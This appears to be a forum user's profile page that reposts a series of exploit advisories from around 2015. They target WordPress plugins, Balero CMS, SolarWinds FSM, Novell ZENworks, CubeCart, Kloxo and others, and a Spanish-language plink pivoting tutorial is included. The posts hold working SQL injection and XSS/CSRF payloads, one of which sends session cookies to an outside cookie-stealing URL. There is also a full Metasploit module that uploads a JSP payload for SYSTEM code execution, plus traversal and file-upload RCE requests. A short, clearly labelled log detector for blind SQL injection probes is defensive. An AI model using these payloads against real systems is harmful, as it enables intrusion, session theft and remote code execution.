
Everything posted by HireHackking
-
WordPress Plugin All In One WP Security & Firewall 3.9.0 - SQL Injection
######################
# Exploit Title : WordPress All In One WP Security & Firewall 3.9.0 SQL Injection Vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
# Software Link : https://mega.co.nz/#!DJAEBLBS!IBiukGo-pirelHmsRV80xZDHIvpqZKtTIqsD8YrMf7U
# Date : 2015-04-05
# Tested on : Linux / Mozilla Firefox
######################

# Description

WordPress All In One WP Security & Firewall 3.9.0 suffers from a Blind SQL Injection vulnerability.

There are some pages with the wordpress esc_sql function.
esc_sql is prone to Blind SQL Injection (discovered by Ryan Dewhurst - http://dewhurstsecurity.com/)

isset($_GET["orderby"]) ? $orderby = strip_tags($_GET["orderby"]): $orderby = '';
isset($_GET["order"]) ? $order = strip_tags($_GET["order"]): $order = '';

- admin/wp-security-list-404.php

$orderby = !empty($orderby) ? esc_sql($orderby) : 'id';
$order = !empty($order) ? esc_sql($order) : 'DESC';
...
...
$data = $wpdb->get_results("SELECT * FROM $events_table_name ORDER BY $orderby $order", ARRAY_A);

- admin/wp-security-list-login-fails.php

$orderby = !empty($orderby) ? esc_sql($orderby) : 'failed_login_date';
$order = !empty($order) ? esc_sql($order) : 'DESC';
$data = $wpdb->get_results("SELECT * FROM $failed_logins_table_name ORDER BY $orderby $order", ARRAY_A);

- admin/wp-security-list-acct-activity-php

$orderby = !empty($orderby) ? esc_sql($orderby) : 'login_date';
$order = !empty($order) ? esc_sql($order) : 'DESC';
$data = $wpdb->get_results("SELECT * FROM $login_activity_table ORDER BY $orderby $order LIMIT 50", ARRAY_A)

- admin/wp-security-list-locked-ip.php

$orderby = !empty($orderby) ? esc_sql($orderby) : 'failed_login_date';
$order = !empty($order) ? esc_sql($order) : 'DESC';
$data = $wpdb->get_results("SELECT * FROM $lockdown_table_name WHERE release_date > now() ORDER BY $orderby $order", ARRAY_A)

######################

# PoC

http://VICTIM//wp-admin/admin.php?page=aiowpsec&tab=tab3&orderby=user_id,(select * from (select(sleep(30)))a)&order=asc

######################

# Vulnerability Disclosure Timeline:

2015-04-05: Discovered vulnerability
2015-04-06: Vendor Notification
2015-04-06: Vendor Response/Feedback
2015-04-07: Vendor Send Fix/Patch (3.9.1)
2015-04-07: Public Disclosure

#######################

Discovered By : Claudio Viviani
http://www.homelab.it
http://ffhd.homelab.it (Free Fuzzy Hashes Database)
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################
-
WordPress Plugin Traffic Analyzer 3.4.2 - Blind SQL Injection
# Exploit Title: Wordpress plugin 'Traffic Analyzer' Blind SQL Injection
# Google Dork: inurl:/plugins/trafficanalyzer/js/
# Date: 4/7/2015
# Exploit Author: Dan King (@fuzztester)
# Vendor Homepage: http://wptrafficanalyzer.in/
# Software Link: https://wordpress.org/plugins/trafficanalyzer/
# Version: 3.4.2
# Tested on: Ubuntu 14.10 with Mysql and Wordpress 4.11

[+] Issue [+]
The Wordpress plugin "Traffic Analyzer" is vulnerable to a blind SQL injection vulnerability. The application does not properly validate input from the "Referer" HTTP header value.

[+] Impact [+]
This vulnerability would allow a remote attacker to access the database with the privileges configured by Wordpress. This could also lead to the attacker gaining remote access to the webserver's filesystem and further compromise the system hosting the Wordpress installation.

[+] Details [+]
The following section of PHP code is where the vulnerability exists. The $sql variable is a concatenated string intended to be used to insert data into the database. The variable $referer is not checked for malicious data.

From 'class-TrafficAnalyzer.php' line number 297:
######################################################################################
$sql = " insert into $wpdb->prefix"."tanalyzer_pre ( hid,ip, script_name, user_agent, request_uri,resource_type,browser,resource,http_referer,wpta_cookie ) values ".
    " ('".$hid."'," .
    " '".$_SERVER["REMOTE_ADDR"]."', ".
    "'".$_SERVER['SCRIPT_NAME']."', " .
    " '".$_SERVER["HTTP_USER_AGENT"]."', ".
    " '". $_SERVER['REQUEST_URI']. "', ".
    " '".$resource_type."', " .
    " '".$browser."', " .
    " '".$resource ."', " .
    " '".$referer . "', " .
    " '".$this->wpta_cookie . "'" .
    " )";
###########################################################################################

[+] Proof of Concept [+]
Sending the following HTTP request to a vulnerable site will cause the request to be delayed for 30 seconds.

GET /[wordpress path]/ HTTP/1.1
Host: x.x.x.x
Referer: BLAH'||(SELECT 'Fdsf' FROM DUAL WHERE 5435=5435 and SLEEP(30) )||'
-
Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities
<!--
Balero CMS v0.7.2 Multiple JS/HTML Injection Vulnerabilities

Vendor: BaleroCMS Software
Product web page: http://www.balerocms.com
Affected version: 0.7.2

Summary: Balero CMS is an open source project that can help you manage the page of your company with just a few guided steps, minimizing the costs that many companies make to have your advertising medium and/or portal.

Desc: Input passed to the 'content' POST parameter and the cookie 'counter' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21

Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2015-5239
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5239.php

04.03.2015
-->

<html>
<body>
<script>
document.cookie="counter=1<script>confirm('XSS')</script>; path=/balerocms/";
</script>
</body>
</html>

csrf+stored xss+filter bypass+session hijack:

<html>
<body>
<form action="http://localhost/balerocms/admin/edit_delete_post/mod-blog" method="POST">
<input type="hidden" name="title" value="ZSL" />
<input type="hidden" name="content" value="pwned</textarea><s\cript>document.location="http://www.zeroscience.mk/pentest/cthief.php?cookie="+docu\ment.cookie;</s\cript>" />
<input type="hidden" name="files" value="joxy.poxy" />
<input type="hidden" name="delete_post[]" value="135" />
<input type="hidden" name="id" value="135" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
-
Balero CMS 0.7.2 - Multiple Blind SQL Injections
Balero CMS v0.7.2 Multiple Blind SQL Injection Vulnerabilities

Vendor: BaleroCMS Software
Product web page: http://www.balerocms.com
Affected version: 0.7.2

Summary: Balero CMS is an open source project that can help you manage the page of your company with just a few guided steps, minimizing the costs that many companies make to have your advertising medium and/or portal.

Desc: The application suffers from multiple blind SQL injection vulnerabilities when input is passed to several POST parameters thru their affected modules which are not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Vulnerable POST parameters in affected modules:
-----------------------------------------------
- pages [admin]
- themes [admin]
- code [mod-languages]
- id [mod-blog, mod-virtual_page]
- title [mod-blog]
- a [mod-virtual_page]
- virtual_title [mod-virtual_page]
-----------------------------------------------

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21

Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2015-5238
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5238.php

04.03.2015

--

csrf+bsqli poc:

<html>
<body>
<form action="http://localhost/balerocms/admin/edit_page/mod-virtual_page/id-11" method="POST">
<input type="hidden" name="virtual_title" value="ZSL" />
<input type="hidden" name="a" value="1" />
<input type="hidden" name="content" value="Testingus" />
<input type="hidden" name="_wysihtml5_mode" value="1" />
<input type="hidden" name="id" value="11' and benchmark (50000000,sha1(1))-- " />
<input type="hidden" name="submit_delete" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
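Added example (not from any of the advisories above): a small detector for the time-delay primitives that the three blind SQL injection PoCs above rely on (sleep() in a query string, SLEEP() in a Referer header, benchmark()), run over constructed Apache/nginx combined-format log lines modelled on those PoCs. It assumes the log is in combined format; payloads sent in a POST body, like Balero's id parameter, never reach an access log, so the same check must run in the application or a WAF.

```python
"""Flag time-based blind SQL injection probes (SLEEP/BENCHMARK) in web access logs."""
from __future__ import annotations

import re
from urllib.parse import unquote_plus

# Apache/nginx "combined" format (an assumption about the log source):
# host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Delay primitives used by time-based probes on MySQL, PostgreSQL and MSSQL.
DELAY_RE = re.compile(
    r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.IGNORECASE
)


def _normalize(value: str) -> str:
    """Percent-decode until stable (max 3 rounds) so double encoding is not a bypass."""
    for _ in range(3):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_log_line(line: str) -> list[dict]:
    """Return one finding per field (request URL or Referer) carrying a delay primitive."""
    m = LOG_RE.match(line)
    if not m:
        return []  # not combined format; a real pipeline would count these separately
    parts = m.group("request").split(" ")
    url = parts[1] if len(parts) >= 2 else m.group("request")
    findings = []
    for field, raw in (("request", url), ("referer", m.group("referer"))):
        decoded = _normalize(raw)
        hit = DELAY_RE.search(decoded)
        if hit:
            findings.append({
                "host": m.group("host"),
                "time": m.group("time"),
                "field": field,
                "primitive": hit.group(0).strip("( ").lower(),
                "decoded": decoded,
            })
    return findings


def scan_log(lines) -> list[dict]:
    """Scan an iterable of log lines and collect every finding in order."""
    return [f for line in lines for f in scan_log_line(line)]


# Constructed sample lines, modelled on the PoCs above; not real traffic.
SAMPLE_LOG = [
    # benign sort request to the plugin page
    '203.0.113.5 - - [07/Apr/2015:10:00:01 +0000] "GET /wp-admin/admin.php?page=aiowpsec&tab=tab3&orderby=user_id&order=asc HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # the orderby probe, percent-encoded the way a browser sends it
    '203.0.113.5 - - [07/Apr/2015:10:00:31 +0000] "GET /wp-admin/admin.php?page=aiowpsec&tab=tab3&orderby=user_id,(select%20*%20from%20(select(sleep(30)))a)&order=asc HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # the probe carried in the Referer header
    '198.51.100.7 - - [07/Apr/2015:10:01:02 +0000] "GET /blog/ HTTP/1.1" 200 8192 "BLAH\'||(SELECT \'Fdsf\' FROM DUAL WHERE 5435=5435 and SLEEP(30) )||\'" "curl/7.38.0"',
    # a double-encoded benchmark() probe in a query parameter
    '198.51.100.7 - - [07/Apr/2015:10:01:40 +0000] "GET /index.php?id=11%2527%2520and%2520benchmark(50000000,sha1(1))--%2520 HTTP/1.1" 200 8192 "-" "curl/7.38.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['host']} {f['field']}: {f['primitive']} in {f['decoded']}")
```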
-
Pivoting con Plink.exe
Plink.exe is the command-line version of the PuTTY SSH client. Recent versions of Windows already ship with a built-in SSH client, so plink is not very useful there; however, it is useful on older systems which do not have that SSH client.

We can usually find the plink binary at: /usr/share/windows-resources/binaries/plink.exe

If not, it can be downloaded from the official PuTTY website.

Since plink.exe is an SSH client, the only thing we can do is Remote Port Forwarding. The danger of this was already discussed in the SSH post: basically, this way you are typing your own machine's credentials on a machine that is not yours, so care must be taken (asymmetric keys can also be used).

The command to use plink.exe is the following:

cmd.exe /c echo y | plink.exe -l <usuario> -pw <contraseña> <ip mia de atacante> -R <puerto que abrimos en mi maquina atacante>:<host de quien queremos tunelizar>:<puerto que queremos tunelizar>

We would transfer plink to the Windows machine and run the command from there. The first part of the command, cmd.exe /c echo y, is there so that in non-interactive shells (as most reverse shells on Windows systems are) we can accept the warning message that plink shows by default. Otherwise, the rest of the command is easy to understand if you have already worked with Remote Port Forwarding; if not, I recommend reading the Pivoting with SSH post.

Besides this, some useful parameters we can add to plink are the following:

-g -> allows other clients on the LAN to connect to the port that is opened on the attacking machine. By default it is only reachable locally.
-f -> plink goes to the background once the SSH session has been established successfully.
-N -> tells it not to run a shell, just to connect (this does not mean the process is sent to the background), that is, it would look like this:

It is quite advisable to use the -f and -N parameters.

-i -> allows specifying a private key. However, a conversion is needed, since plink will not understand the default format that ssh-keygen produces. Once we have generated the private key with ssh-keygen, we follow these steps:

Install the PuTTY tools: sudo apt install putty-tools

Once installed, we use puttygen: puttygen <clave privada> -o <nueva clave privada>.ppk

This way, plink will understand this new private key and we will be able to use it.

With all this explained, let's run a test in the following lab:

3 machines
Kali - IP: 192.168.10.10
Windows 7 - IP: 192.168.10.40 and 192.168.20.40 -> 2 network interfaces
Debian -> Web and SSH server, ports 22 and 80 enabled - IP: 192.168.20.20

NOTE: regarding Remote Port Forwarding, I recommend making a simple password change in passwd. For those who do not know this, basically you can generate a DES UNIX password with openssl:

If we take this generated password and substitute it in passwd for the "x", the user's password will be the one we set in openssl, in this case "hola"; when you want to go back to the previous password, simply remove what was written in passwd and put the "x" back.

With that done, we go to the Windows machine and use plink as indicated in the command written previously:

cmd.exe /c echo y | plink.exe -l <usuario> -pw <contraseña> <ip mia de atacante> -R <puerto que abrimos en mi maquina atacante>:<host de quien queremos tunelizar>:<puerto que queremos tunelizar>

If we look closely, there are two important points here:

We can tunnel as many ports as we want, always using the -R parameter.
When tunnelling an SSH port, we have to tell it to use/open a port on our machine other than 22, since that one is already in use.

This way, we now have both ports tunnelled, in this case 22 (2222 on our machine) and 80:

Plink is a tool that will little by little fall into disuse due to the default inclusion of the SSH client on Windows systems. However, on certain occasions when we are dealing with some older system, it can come in quite handy.
-
SolarWinds Firewall Security Manager 6.6.5 - Client Session Handling (Metasploit)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability",
      'Description'    => %q{
        This module exploits multiple vulnerabilities found in Solarwinds Firewall Security Manager
        6.6.5. The first vulnerability is an authentication bypass via the Change Advisor interface
        due to a user-controlled session.putValue API in userlogin.jsp, allowing the attacker to set
        the 'username' attribute before authentication. The second problem is that the
        settings-new.jsp file will only check the 'username' attribute before authorizing the
        'uploadFile' action, which can be exploited and allows the attacker to upload a fake xls
        host list file to the server, and results in arbitrary code execution under the context
        of SYSTEM.

        Depending on the installation, by default the Change Advisor web server is listening on
        port 48080 for an express install. Otherwise, this service may appear on port 8080.

        Solarwinds has released a fix for this vulnerability as FSM-v6.6.5-HotFix1.zip. You may
        download it from the module's References section.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'rgod',                                    # Original discovery
          'mr_me <steventhomasseeley[at]gmail.com>', # https://twitter.com/ae0n_
          'sinn3r'                                   # Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2015-2284'],
          ['OSVDB', '81634'],
          ['ZDI', '15-107'],
          ['URL', 'http://downloads.solarwinds.com/solarwinds/Release/HotFix/FSM-v6.6.5-HotFix1.zip']
        ],
      'DefaultOptions' =>
        {
          'RPORT' => 48080 # Could be 8080 too
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Solarwinds Firewall Security Manager 6.6.5', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 13 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Base FMS directory path', '/'])
      ], self.class)
  end

  # Returns a checkcode that indicates whether the target is FSM or not
  def check
    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'fsm', 'login.jsp'))
    if res && res.body =~ /SolarWinds FSM Change Advisor/i
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  # Exploit/run command
  def exploit
    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::NotVulnerable, 'Target does not appear to be a Solarwinds Firewall Security Manager')
    end

    # Stage 1 of the attack
    # 'admin' is there by default and you can't delete it
    username = 'admin'
    print_status("Auth bypass: Putting session value: username=#{username}")
    sid = put_session_value(username)
    print_status("Your SID is: #{sid}")

    # Stage 2 of the attack
    exe = generate_payload_exe(code: payload.encoded)
    filename = "#{Rex::Text.rand_text_alpha(5)}.jsp"

    # Because when we get a shell, we will be at:
    # C:\Program Files\SolarWinds\SolarWinds FSMServer\webservice
    # So we have to adjust this filename in order to delete the file
    register_files_for_cleanup("../plugins/com.lisletech.athena.http.servlets_1.2/jsp/#{filename}")

    malicious_file = get_jsp_payload(exe, filename)
    print_status("Uploading file: #{filename} (#{exe.length} bytes)")
    upload_exec(sid, filename, malicious_file)
  end

  private

  # Returns a write-stager
  # I grabbed this from Juan's sonicwall_gms_uploaded.rb module
  def jsp_drop_bin(bin_data, output_file)
    jspraw =  %Q|<%@ page import="java.io.*" %>\n|
    jspraw << %Q|<%\n|
    jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|
    jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|
    jspraw << %Q|int numbytes = data.length();\n|
    jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
    jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
    jspraw << %Q|{\n|
    jspraw << %Q| char char1 = (char) data.charAt(counter);\n|
    jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n|
    jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n|
    jspraw << %Q| comb <<= 4;\n|
    jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n|
    jspraw << %Q| bytes[counter/2] = (byte)comb;\n|
    jspraw << %Q|}\n|
    jspraw << %Q|outputstream.write(bytes);\n|
    jspraw << %Q|outputstream.close();\n|
    jspraw << %Q|%>\n|

    jspraw
  end

  # Returns JSP that executes stuff
  # This is also from Juan's sonicwall_gms_uploaded.rb module
  def jsp_execute_command(command)
    jspraw =  %Q|<%@ page import="java.io.*" %>\n|
    jspraw << %Q|<%\n|
    jspraw << %Q|try {\n|
    jspraw << %Q| Runtime.getRuntime().exec("chmod +x #{command}");\n|
    jspraw << %Q|} catch (IOException ioe) { }\n|
    jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
    jspraw << %Q|%>\n|

    jspraw
  end

  # Returns a JSP payload
  def get_jsp_payload(exe, output_file)
    jsp_drop_bin(exe, output_file) + jsp_execute_command(output_file)
  end

  # Creates an arbitrary username by abusing the server's unsafe use of session.putValue
  def put_session_value(value)
    res = send_request_cgi(
      'uri'      => normalize_uri(target_uri.path, 'fsm', 'userlogin.jsp'),
      'method'   => 'GET',
      'vars_get' => { 'username' => value }
    )

    unless res
      fail_with(Failure::Unknown, 'The connection timed out while setting the session value.')
    end

    get_sid(res)
  end

  # Returns the session ID
  def get_sid(res)
    cookies = res.get_cookies
    sid = cookies.scan(/(JSESSIONID=\w+);*/).flatten[0] || ''
    sid
  end

  # Uploads a malicious file and then execute it
  def upload_exec(sid, filename, malicious_file)
    res = upload_file(sid, filename, malicious_file)

    if !res
      fail_with(Failure::Unknown, 'The connection timed out while uploading the malicious file.')
    elsif res.body.include?('java.lang.NoClassDefFoundError')
      print_status('Payload being treated as XLS, indicates a successful upload.')
    else
      print_status('Unsure of a successful upload.')
    end

    print_status('Attempting to execute the payload.')
    exec_file(sid, filename)
  end

  # Uploads a malicious file
  # By default, the file will be saved at the following location:
  # C:\Program Files\SolarWinds\SolarWinds FSMServer\plugins\com.lisletech.athena.http.servlets_1.2\reports\tickets\
  def upload_file(sid, filename, malicious_file)
    # Put our payload in:
    # C:\Program Files\SolarWinds\SolarWinds FSMServer\plugins\com.lisletech.athena.http.servlets_1.2\jsp\
    filename = "../../jsp/#{filename}"

    mime_data = Rex::MIME::Message.new
    mime_data.add_part(malicious_file, 'application/vnd.ms-excel', nil, "name=\"file\"; filename=\"#{filename}\"")
    mime_data.add_part('uploadFile', nil, nil, 'name="action"')

    proto = ssl ? 'https' : 'http'
    ref = "#{proto}://#{rhost}:#{rport}#{normalize_uri(target_uri.path, 'fsm', 'settings-new.jsp')}"

    send_request_cgi(
      'uri'      => normalize_uri(target_uri.path, 'fsm', 'settings-new.jsp'),
      'method'   => 'POST',
      'vars_get' => { 'action' => 'uploadFile' },
      'ctype'    => "multipart/form-data; boundary=#{mime_data.bound}",
      'data'     => mime_data.to_s,
      'cookie'   => sid,
      'headers'  => { 'Referer' => ref }
    )
  end

  # Executes the malicious file and get code execution
  # We will be at this location:
  # C:\Program Files\SolarWinds\SolarWinds FSMServer\webservice
  def exec_file(sid, filename)
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'fsm', filename)
    )
  end

  # Overrides the original print_status so we make sure we print the rhost and port
  def print_status(msg)
    super("#{rhost}:#{rport} - #{msg}")
  end
end
-
Novell ZENworks Configuration Management 11.3.1 - Remote Code Execution
>> Remote code execution in Novell ZENworks Configuration Management 11.3.1
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 07/04/2015 / Last updated: 07/04/2015

>> Background on the affected product:
"Automate and accelerate your Windows 7 migration
Microsoft estimates that it can take more than 20 hours to migrate a single machine to Windows 7. Novell ZENworks Configuration Management is ready to dramatically accelerate and automate every aspect of your Windows 7 migration efforts.

Boost user productivity
Use Novell ZENworks Configuration Management to make sure users always have access to the resources they need regardless of where they work or what devices they use.

Eliminate IT effort
Automatically enforce policies and dynamically manage resources with identity-based management of users as well as devices.

Expand your freedom to choose
Manage the lifecycles of all your current and future assets, with full support for Windows and Linux systems, Novell eDirectory, Active Directory, and more.

Simplify deployment with virtual appliances
Slash deployment times with a convenient virtual appliance deployment option.

Enjoy a truly unified solution
Centralize the management of all your devices into a single, unified and easy-to-use web-based ZENworks console—called ZENworks Control Center."

This vulnerability is present in ZENworks Configuration Management (ZCM) which is part of the ZENworks Suite.

A blast from the past? This is a similar vulnerability to ZDI-10-078 / OSVDB-63412, but it abuses a different parameter of the same servlet. However this time Novell:
- Did not bother issuing a security advisory to their customers.
- Did not credit me even though I did responsible disclosure.
- Refused to provide a CVE number for months.
- Did not update their ZENworks Suite Trial software with the fix (you can download it now from their site, install and test the PoC / Metasploit module).
- Does not list the fix in the ZCM 11.3.2 update information (https://www.novell.com/support/kb/doc.php?id=7015776).

>> Technical details:
Vulnerability: Remote code execution via file upload and directory traversal
CVE-2015-0779
Constraints: none; no authentication or any other information needed
Affected versions: ZENworks Configuration Management 11.3.1 and below

POST /zenworks/UploadServlet?uid=../../../opt/novell/zenworks/share/tomcat/webapps/&filename=payload.war
<WAR file payload in the body>

The WAR file will be automatically deployed to the server (on certain Windows and Linux installations the path can be "../webapps/").

A Metasploit module that exploits this vulnerability has been released.

>> Fix:
Upgrade to version ZENworks Configuration Management 11.3.2.

[1]: https://github.com/pedrib/PoC/blob/master/generic/zenworks_zcm_rce.txt
[2]: https://github.com/rapid7/metasploit-framework/pull/5096
-
Trendnet Camera (Multiple Products) - Remote Security Bypass
source: https://www.securityfocus.com/bid/51922/info

Multiple Trendnet Camera products are prone to a remote security-bypass vulnerability.

Successfully exploiting this issue will allow remote attackers to gain access to a live stream from the camera.

http://www.example.com/anony/mjpg.cgi
-
Apache MyFaces - 'ln' Information Disclosure
source: https://www.securityfocus.com/bid/51939/info

Apache MyFaces is prone to a remote information-disclosure vulnerability.

Remote attackers can exploit this issue to obtain sensitive information that may aid in further attacks.

The following versions are affected:
Apache MyFaces 2.0.1 through 2.0.11
Apache MyFaces 2.1.0 through 2.1.5

http://www.example.com/faces/javax.faces.resource/web.xml?ln=../WEB-INF
http://www.example.com/faces/javax.faces.resource/web.xml?ln=..\\WEB-INF
-
PHP PDORow Object - Remote Denial of Service
source: https://www.securityfocus.com/bid/51952/info

PHP is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to cause the web server to crash, denying service to legitimate users.

PHP 5.3.8 is vulnerable; other versions may also be affected.

<?php
// make a Pdo_Mysql statement before
$result = $stmt->fetch(PDO::FETCH_LAZY);
session_start();
$_SESSION['PDORow'] = $result;
?>
-
LxCenter Kloxo 6.1.10 - Multiple HTML Injection Vulnerabilities
source: https://www.securityfocus.com/bid/51964/info

LxCenter Kloxo is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Kloxo 6.1.0 is vulnerable; other versions may be affected.

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers with medium required user interaction.
For demonstration or reproduce ...

1.1 Localhost {Command Center}

<script> global_need_list = new Array(); </script>
<script> global_match_list = new Array(); </script>
<script> global_desc_list = new Array(); </script>
<form onsubmit=``return check_for_needed_variables(`command_centerlocalhost`);`` method=``post`` enctype=``multipart/form-data`` action=``/display.php`` id=``command_centerlocalhost`` name=``command_centerlocalhost``>
<fieldset style=``background-color: rgb(255, 255, 255); border: 0px none; padding: 10px;`` width=``90%``><legend style=`` font-weight: normal; border: 0px none;``><font color=``#303030`` style=``font-weight: bold;``>Command Center for localhost </font> </legend></fieldset>
<div align=``left`` style=``background-color: rgb(255, 255, 255); width: 90%;``><div align=`` left`` style=``width: 500px; border: 1px solid rgb(177, 192, 240);``><input type=``hidden`` value=``pserver`` name=``frm_o_o[0][class]``/>
<input type=``hidden`` value=``localhost`` name=``frm_o_o[0][nname]``/>
<div align=``left`` style=``padding: 10px; background-color: rgb(250, 248, 248); display: block;``> Command <br/>
...
or
<input width=``60%`` type=``text`` value=`` name=``frm_pserver_c_ccenter_command`` class=``frm_pserver_c_ccenter_command textbox``/>
<iframe size=``30`` <``=`` [PERSISTENT SCRIPT CODE INJECT!]` src=``a``> </div>
<div align=left style=`padding:10 10 10 10 ;border-top :1px solid #aaaaaa; background-color:#ffffff;display:block` > Output <br>
<textarea nowrap id=textarea_ class= frmtextarea rows=10 style=`margin:0 0 0 50;width:85%;height:200px;` name=`` size=30 ></textarea>
<script type=``text/javascript``>createTextAreaWithLines(`textarea_`);</script>
<style>

1.2 Server => Information => 2 x Verbose Input

<font color=``#303030`` style=``font-weight: bold;``>Information for localhost </font> </legend></fieldset>
<div align=``left`` style=``background-color: rgb(255, 255, 255); width: 90%;``><div align=``left`` style=``width: 500px; border: 1px solid rgb(177, 192, 240);``><input type=``hidden`` value=``pserver`` name=``frm_o_o[0][class]``/>
<input type=``hidden`` value=``localhost`` name=``frm_o_o[0][nname]``/>
<script> global_need_list[`frm_pserver_c_description`] = `Verbose Description (to Identify)`; </script>
<div align=``left`` style=``padding: 10px; background-color: rgb(250, 248, 248); display: block;``> Verbose Description (to Identify) <font color=``red``><sup>*</sup></font> <br/>
<input width=``60%`` type=``text`` [PERSISTENT SCRIPT CODE INJECT!]`` <iframe=`` value=`` >`` name=``frm_pserver_c_description`` class=``frm_pserver_c_description textbox``/>`` size=``30``> </div>
<div align=``left`` style=`` padding: 10px; border-top: 1px solid rgb(170, 170, 170); background-color: rgb(255, 255, 255); display: block;``> FQDN Hostname <br/>
<input width=``60%`` type=``text`` [PERSISTENT SCRIPT CODE INJECT!]`` <iframe=`` value=``>`` name=``frm_pserver_c_realhostname`` class=`` frm_pserver_c_realhostname textbox``/>`` size=``30``> </div>
<div align=``left`` style=``padding: 10px; border-top: 1px solid rgb(170, 170, 170); background-color: rgb(250, 248, 248); display: block;``> Load Threshold At Which Warning Is Sent <br/>
<input width=``60%`` type=``text`` size=``30`` value=``20`` name=``frm_pserver_c_load_threshold`` class=``frm_pserver_c_load_threshold textbox``/> </div>
<input type= ``hidden`` value=``update`` name=``frm_action``/>
<input type=``hidden`` value=``information`` name=``frm_subaction``/>

Reference(s):
../command-center.txt
../server-verbose-input.txt
-
Dolibarr ERP/CRM 3.x - '/adherents/fiche.php' SQL Injection
source: https://www.securityfocus.com/bid/51956/info

Dolibarr is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Dolibarr 3.2.0 Alpha is vulnerable; other versions may also be affected.

http://www.example.com/adherents/fiche.php?rowid=-1%27
-
CubeCart 3.0.20 - '/admin/login.php?goto' Arbitrary Site Redirect
source: https://www.securityfocus.com/bid/51966/info

CubeCart is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.

A successful exploit may aid in phishing attacks; other attacks are possible.

CubeCart 3.0.20 is vulnerable; other versions may also be affected.

http://www.example.com/cube3.0.20/admin/login.php?goto=//yehg.net
-
CubeCart 3.0.20 - Multiple Script 'redir' Arbitrary Site Redirects
source: https://www.securityfocus.com/bid/51966/info

CubeCart is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.

A successful exploit may aid in phishing attacks; other attacks are possible.

CubeCart 3.0.20 is vulnerable; other versions may also be affected.

http://www.example.com/cube/index.php?act=login&redir=Ly95ZWhnLm5ldC8%3D
http://www.example.com/cube/cart.php?act=reg&redir=L2N1YmUvaW5kZXgucGhwP2FjdD1sb2dpbg%3D%3D
-
CubeCart 3.0.20 - 'switch.php?r' Arbitrary Site Redirect
source: https://www.securityfocus.com/bid/51966/info

CubeCart is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.

A successful exploit may aid in phishing attacks; other attacks are possible.

CubeCart 3.0.20 is vulnerable; other versions may also be affected.

http://www.example.com/cube3.0.20/switch.php?r=//yehg.net/&lang=es
-
Zen Cart 1.3.9h - '/path_to_admin/product.php' Cross-Site Request Forgery
source: https://www.securityfocus.com/bid/51968/info

Zen Cart is prone to a cross-site request-forgery vulnerability.

